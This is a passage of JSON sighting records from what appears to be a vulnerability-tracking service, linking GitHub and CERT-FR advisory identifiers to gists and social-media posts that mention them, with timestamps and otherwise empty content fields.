"c537057d-6c80-45e3-a090-4a3fddc8eeb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hpg-fw6g-w3qj", "type": "seen", "source": "https://gist.github.com/Nexory/f6bb07c8203741740b7413e3fb5b5c3e", "content": "", "creation_timestamp": "2026-05-29T01:01:28.000000Z"}, {"uuid": "f8474f35-453e-4ad9-b9d2-70d3127771f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/bee18fb64e1375bf0252a9d7c13b4b43", "content": "", "creation_timestamp": "2026-05-29T07:55:24.000000Z"}, {"uuid": "0e711d05-b52d-4bfc-aeac-d53fdd2791e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/bee18fb64e1375bf0252a9d7c13b4b43", "content": "", "creation_timestamp": "2026-05-29T07:55:24.000000Z"}, {"uuid": "4dc5cec5-123a-4587-9a2a-287228edd339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/bee18fb64e1375bf0252a9d7c13b4b43", "content": "", "creation_timestamp": "2026-05-29T07:55:24.000000Z"}, {"uuid": "50f48bef-1c22-4507-9fc7-e415d179d7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/bee18fb64e1375bf0252a9d7c13b4b43", "content": "", "creation_timestamp": "2026-05-29T07:55:24.000000Z"}, {"uuid": "e89327ec-2368-4d5f-89c6-ec634c9e3e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/bee18fb64e1375bf0252a9d7c13b4b43", "content": "", "creation_timestamp": "2026-05-29T07:55:24.000000Z"}, {"uuid": "81584273-eb2f-4b39-b284-bc2b329cf6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35jp-ww65-95wh", "type": "seen", "source": "https://gist.github.com/konard/e2cdc40115fd7e81d8828ab9496865a2", "content": "", "creation_timestamp": "2026-05-29T21:20:01.000000Z"}, {"uuid": "961a396b-ab00-4e7c-a38b-08e7984fdae5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjwm-pj3p-43mv", "type": "seen", "source": "https://gist.github.com/konard/e2cdc40115fd7e81d8828ab9496865a2", "content": "", "creation_timestamp": "2026-05-29T21:20:01.000000Z"}, {"uuid": "503b485f-359c-4671-ad2a-18e482aff478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/6f3fc7c93fd53b7c007de866b88b7725", "content": "", "creation_timestamp": "2026-05-29T22:23:20.000000Z"}, {"uuid": "f571a023-e13a-46fb-b6d9-795f7a53d027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/6f3fc7c93fd53b7c007de866b88b7725", "content": "", "creation_timestamp": "2026-05-29T22:23:20.000000Z"}, {"uuid": "dfbbfee2-e12e-4e13-aaa8-cedd7a393b8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3v7f-55p6-f55p", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "b6a0512a-4a22-4180-8e6e-747c16802a4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c2c7-rcm5-vvqj", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "b84ce516-6742-404e-b93c-4d3afe386e75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "42b73071-98f8-4c05-91d9-4edd96a53b9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qx2v-qp2m-jg93", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "e9161a9c-407d-4d11-a461-8068348d20bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4w7w-66w2-5vf9", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "8da4c55a-f506-4a2c-b4a4-a310e88a8290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9ff-h696-f583", "type": "seen", "source": "https://gist.github.com/konard/ddaf1c7a82581f9e29a8359316e48df3", "content": "", "creation_timestamp": "2026-05-30T02:23:48.000000Z"}, {"uuid": "d527ba0f-0b83-4cda-b2f5-c04d7a1367a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rj6c-83wx-jxf2", "type": "seen", "source": "https://gist.github.com/zmanian/08280e428b3f9b90551a2fa74a4b1a40", "content": "", "creation_timestamp": "2026-05-30T04:43:13.000000Z"}, {"uuid": "1ca93a95-92d4-454b-ac5c-d0fd44fd6938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3v7f-55p6-f55p", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "57afa1b4-1c01-4a21-9aa3-90fd1f8df049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c2c7-rcm5-vvqj", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "fdc6f32c-a298-4d5f-b8b3-5f5937ac92fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "c0b44f9a-a3a8-42dc-804b-c30f5009217c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qx2v-qp2m-jg93", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "0bfe484b-cdb3-44eb-8165-abcc2d649a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9ff-h696-f583", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "90b57fbe-78a4-4c99-94c2-7785b77c01c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4w7w-66w2-5vf9", "type": "seen", "source": "https://gist.github.com/konard/f3567870039c68dff77f077e839add9b", "content": "", "creation_timestamp": "2026-05-30T12:07:18.000000Z"}, {"uuid": "66427170-b96a-4abe-8eac-963adf4e321a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x746-7m8f-x49c", "type": "seen", "source": "https://gist.github.com/ftnext/f3a40adeae641644a9cbad660d0234cb", "content": "", "creation_timestamp": "2026-05-31T03:42:36.000000Z"}, {"uuid": "ddbdb752-9d14-41a9-8a2f-f9cd6d7060c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x746-7m8f-x49c", "type": "seen", "source": "https://gist.github.com/ftnext/833b2536b55601402ace7b2a4b8cd024", "content": "", "creation_timestamp": "2026-05-31T03:41:45.000000Z"}, {"uuid": "cd2adc8f-3e8a-4ba1-9ffb-030ef1305d01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-63gr-g7jc-v8rg", "type": "seen", "source": "https://gist.github.com/alon710/64eb910b8e690847cdc9aafa60c45d51", "content": "", "creation_timestamp": "2026-06-03T09:11:00.000000Z"}, {"uuid": "bc70878e-3fcc-4fe1-8a95-ed0d24b64c10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "seen", "source": "https://gist.github.com/alon710/f442847fd0d81ee05bc55bd2cc39ff9c", "content": "", "creation_timestamp": "2026-06-03T11:02:14.000000Z"}, {"uuid": "805ee115-9fb8-4663-be9b-120b105f0152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8c9q-7855-wfxq", "type": "seen", "source": "https://gist.github.com/RajChowdhury240/ef00625ae70d7b3d699df82988a7c326", "content": "", "creation_timestamp": "2026-06-03T11:37:39.000000Z"}, {"uuid": "08e96bb0-4b6e-4a5a-a668-a1867e4f3cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35JP-WW65-95WH", "type": "seen", "source": "https://t.me/bdufstecru/3216", "content": "", "creation_timestamp": "2026-06-03T14:43:57.000000Z"}, {"uuid": "df2a0277-68db-4683-a97d-406f8d139a81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PH9P-34F9-6G65", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3217", "content": "", "creation_timestamp": "2026-06-03T14:45:48.000000Z"}, {"uuid": "fb7c6187-6a92-444a-a6a9-bf1c03b935a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XJXG-64P4-VJ4M", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3214", "content": "", "creation_timestamp": "2026-06-03T14:41:54.000000Z"}, {"uuid": "59516561-f591-4045-998d-dbf7a30c71fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c27g-q93r-2cwf", "type": "seen", "source": "https://gist.github.com/alon710/8b99e8a330b30729487263e5e6c526a7", "content": "", "creation_timestamp": "2026-06-03T18:51:02.000000Z"}, {"uuid": "7b2806bb-80c9-4ff5-b6fc-b74136938eda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c27g-q93r-2cwf", "type": "seen", "source": "https://gist.github.com/alon710/af9fd1f0bf5e15b0603c7992be5645c7", "content": "", "creation_timestamp": "2026-06-03T19:00:57.000000Z"}, {"uuid": "2cc931de-525e-4a2d-9cd3-a165595ce4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8xx-3x29-84h8", "type": "seen", "source": "https://gist.github.com/alon710/318ae5a8389c9b8cdb7f278e7a67a44b", "content": "", "creation_timestamp": "2026-06-03T20:40:55.000000Z"}, {"uuid": "634752f7-918c-466f-bec9-beb0740933bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2j2x-hqr9-3h42", "type": "seen", "source": "https://gist.github.com/alon710/c225f7d330b57c3901ac40c39f91bf81", "content": "", "creation_timestamp": "2026-06-03T21:10:57.000000Z"}, {"uuid": "84d6905a-bb5a-4dbc-96cf-4698da83ba1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rwcw-vq68-g34p", "type": "seen", "source": "https://bsky.app/profile/tesaguri.fedibird.com.ap.brid.gy/post/3mnfzz4cfjm62", "content": "", "creation_timestamp": "2026-06-03T21:20:17.973185Z"}, {"uuid": "16c72398-4b75-4de0-83d8-074dc72311c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8x6r-g9mw-2r78", "type": "seen", "source": "https://gist.github.com/alon710/7cf799e784cb7e5d54b5d97af1f62323", "content": "", "creation_timestamp": "2026-06-03T21:41:07.000000Z"}, {"uuid": "fab95605-3acc-4f39-88b8-3afb4528b803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F9RX-7WF7-JR36", "type": "seen", "source": "https://gist.github.com/alon710/067712fc0b9798c132c204b55ab42a44", "content": "", "creation_timestamp": "2026-06-03T22:11:20.000000Z"}, {"uuid": "6f8b0eb5-5c92-4437-9236-44c81621fdbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-34qg-65m4-f23m", "type": "seen", "source": "https://gist.github.com/alon710/067712fc0b9798c132c204b55ab42a44", "content": "", "creation_timestamp": "2026-06-03T22:11:20.000000Z"}, {"uuid": "4f804da5-c6db-45f4-8b4a-a03d92c7da14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6vr3-7wcx-v5g5", "type": "seen", "source": "https://gist.github.com/alon710/0a4fd57da163f29a224f9f12ea16fb50", "content": "", "creation_timestamp": "2026-06-03T22:40:56.000000Z"}, {"uuid": "ccdee94a-2313-4f34-b45f-30fc23dbcbfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8rpw-6cqh-2v9h", "type": "seen", "source": "https://gist.github.com/alon710/f7bc5351b219485c56b8d23a92985578", "content": "", "creation_timestamp": "2026-06-03T23:10:53.000000Z"}, {"uuid": "0b666f24-dbb5-45ba-9a63-4c275f7107fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8rpw-6cqh-2v9h", "type": "seen", "source": "https://gist.github.com/alon710/c96f50c47f9fff8e91b22c3cc55eaa13", "content": "", "creation_timestamp": "2026-06-03T23:20:57.000000Z"}, {"uuid": "a240c673-893d-44eb-99aa-72457409921f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hg6j-4rv6-33pg", "type": "seen", "source": "https://gist.github.com/alon710/9df1d7e2f4cb5ed041eded527313ebbc", "content": "", "creation_timestamp": "2026-06-03T23:40:58.000000Z"}, {"uuid": "4b9157c4-d284-43bc-8fc2-915fc67970f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-49rj-9fvp-4h2h", "type": "seen", "source": "https://gist.github.com/alon710/cecab85d181ca5255e1b29e5e5dd0f30", "content": "", "creation_timestamp": "2026-06-04T00:50:54.000000Z"}, {"uuid": "9174962b-fd72-4d7f-8934-3b28eca841e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-49rj-9fvp-4h2h", "type": "seen", "source": "https://gist.github.com/alon710/6d419a56b43f4ac63f23facb23062d82", "content": "", "creation_timestamp": "2026-06-04T00:40:58.000000Z"}, {"uuid": "5f4ddcc5-3a33-4a9e-a949-a2e945d8f276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-93m2-935m-8rj3", "type": "seen", "source": "https://gist.github.com/alon710/99a19d019be27796ebd7628a70079b9c", "content": "", "creation_timestamp": "2026-06-04T07:10:55.000000Z"}, {"uuid": "a06d6d74-48bc-47de-8c72-18bb9480b89f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2qlw5l2k", "content": "", "creation_timestamp": "2026-06-04T11:22:16.645065Z"}, {"uuid": "2eed677f-8d8c-4f9f-b2d0-a8cab58f2ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2p5zfl2k", "content": "", "creation_timestamp": "2026-06-04T11:22:16.125968Z"}, {"uuid": "55709ff3-1ab4-44bc-825f-6487b770a6a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2p5ygd2k", "content": "", "creation_timestamp": "2026-06-04T11:22:15.320193Z"}, {"uuid": "53e49572-18cd-4fa9-ac16-78039f7c9b8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2p5ygc2k", "content": "", "creation_timestamp": "2026-06-04T11:22:14.471535Z"}, {"uuid": "5397a3a5-5891-42a9-8ac1-46379bb39ef0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2p5whs2k", "content": "", "creation_timestamp": "2026-06-04T11:22:13.720084Z"}, {"uuid": "f1e741a0-564b-4500-8f5f-06c5a4d82ba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vg9-5847-vvmq", "type": "seen", "source": "https://bsky.app/profile/happytodev.bsky.social/post/3mnhj2mjuzc2k", "content": "", "creation_timestamp": "2026-06-04T11:22:13.114234Z"}, {"uuid": "23637def-5cf5-406a-aab4-c4f6d8c72111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-86qp-5c8j-p5mr", "type": "seen", "source": "https://gist.github.com/alon710/cb3b1174ebf48e827d68142e3b30cd37", "content": "", "creation_timestamp": "2026-06-04T13:40:58.000000Z"}, {"uuid": "1e604c24-aec3-487d-858e-2038130e0d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fr49-mhgj-crfc", "type": "seen", "source": "https://gist.github.com/alon710/010787d34dde83f4031b6f6c155ccffb", "content": "", "creation_timestamp": "2026-06-04T15:20:57.000000Z"}, {"uuid": "7f4d4733-5ab5-4b95-a26a-ca04f1477f83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rxv8-25v2-qmq8", "type": "seen", "source": "https://gist.github.com/alon710/3d94838c8c562b52d8cc99e4e0d339c7", "content": "", "creation_timestamp": "2026-06-04T15:40:51.000000Z"}, {"uuid": "2a769bcd-5a23-4964-8331-cd319111866a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qfwv-87qj-98xq", "type": "seen", "source": "https://gist.github.com/alon710/e01fe3eef2f4071e63ac4580c1c830af", "content": "", "creation_timestamp": "2026-06-04T16:10:59.000000Z"}, {"uuid": "259e6424-1fbf-4bb7-9805-9bb1838df1db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2gcr-mfcq-wcc3", "type": "seen", "source": "https://gist.github.com/alon710/9a85ace33b5f15b6d07a68897c3ce675", "content": "", "creation_timestamp": "2026-06-04T18:41:16.000000Z"}, {"uuid": "930acdf4-c087-4aaf-812c-8c7c7d500ac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8whc-2wmv-ww35", "type": "seen", "source": "https://gist.github.com/alon710/e4f45dc043ae5511143b6c6428b68699", "content": "", "creation_timestamp": "2026-06-04T19:11:03.000000Z"}, {"uuid": "dec31ddb-57ea-4d52-8fb0-b978df9cb106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9392-pj54-qqf8", "type": "seen", "source": "https://gist.github.com/alon710/94ad07ac90371ecb50e3be0d7c9cdb9e", "content": "", "creation_timestamp": "2026-06-04T19:50:59.000000Z"}, {"uuid": "d805dc88-c28a-49f5-a558-ccbf6e4b82c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wh69-wc6q-7888", "type": "seen", "source": "https://gist.github.com/moizxsec/c42bfada3bf659de639c1c1c2ff88abc", "content": "", "creation_timestamp": "2026-06-08T10:21:08.000000Z"}, {"uuid": "68e0fa81-9cb9-4e29-b2cf-adc885daa0f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-025", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116714715813037267", "content": "", "creation_timestamp": "2026-06-08T13:27:12.904271Z"}, {"uuid": "a0603ca4-6e22-48ce-b930-004aa51e953a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-025", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mnrrvuu4na2y", "content": "", "creation_timestamp": "2026-06-08T13:27:10.138313Z"}, {"uuid": "d9170bb1-0a98-4ca1-8bc6-f49234d4c0c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-024", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mnrsv5au222s", "content": "", "creation_timestamp": "2026-06-08T13:44:39.332667Z"}, {"uuid": "5115164e-34b6-43ea-bb76-ed01c70c0558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-025", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mnrufr3vz326", "content": "", "creation_timestamp": "2026-06-08T14:11:50.720583Z"}, {"uuid": "40123842-c607-46d6-9e99-cefd3c3171e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hw9r-6m78-w6h3", "type": "seen", "source": "https://gist.github.com/alon710/56fac469b83d68f32bede1d2945e0063", "content": "", "creation_timestamp": "2026-06-08T15:11:10.000000Z"}, {"uuid": "2940a09f-3b8f-4303-a5c5-51adc314ef05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v4p8-mg3p-g94g", "type": "seen", "source": "https://infosec.exchange/users/secdb/statuses/116716025409567659", "content": "", "creation_timestamp": "2026-06-08T22:07:55.823227Z"}, {"uuid": "fc58efa7-a84d-4923-8d19-0ba7d93f4edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-22m2-hvr2-xqc8", "type": "seen", "source": "https://gist.github.com/lyuyun/60b1d6a8ad599cf3430761a4b380b17e", "content": "", "creation_timestamp": "2026-06-09T02:27:39.000000Z"}, {"uuid": "7ef549dc-4fb5-4c63-a80e-e6b56edbf247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vx74-f528-fxqg", "type": "seen", "source": "https://gist.github.com/ishideo/2ef9371157b4cfc12ab0e8d4afc0847b", "content": "", "creation_timestamp": "2026-06-09T03:35:55.000000Z"}, {"uuid": "f4c0f277-3b10-4b94-88b2-871782baad5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7jw-789q-3m8p", "type": "seen", "source": "https://gist.github.com/alon710/7c6790428586de0d6663a6b961e49e06", "content": "", "creation_timestamp": "2026-06-09T14:41:30.000000Z"}, {"uuid": "8772cfef-4321-41e5-bcd4-431810b84dc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-438c-3975-5x3f", "type": "seen", "source": "https://gist.github.com/alon710/8327e427344b759299d1377846fdfcd3", "content": "", "creation_timestamp": 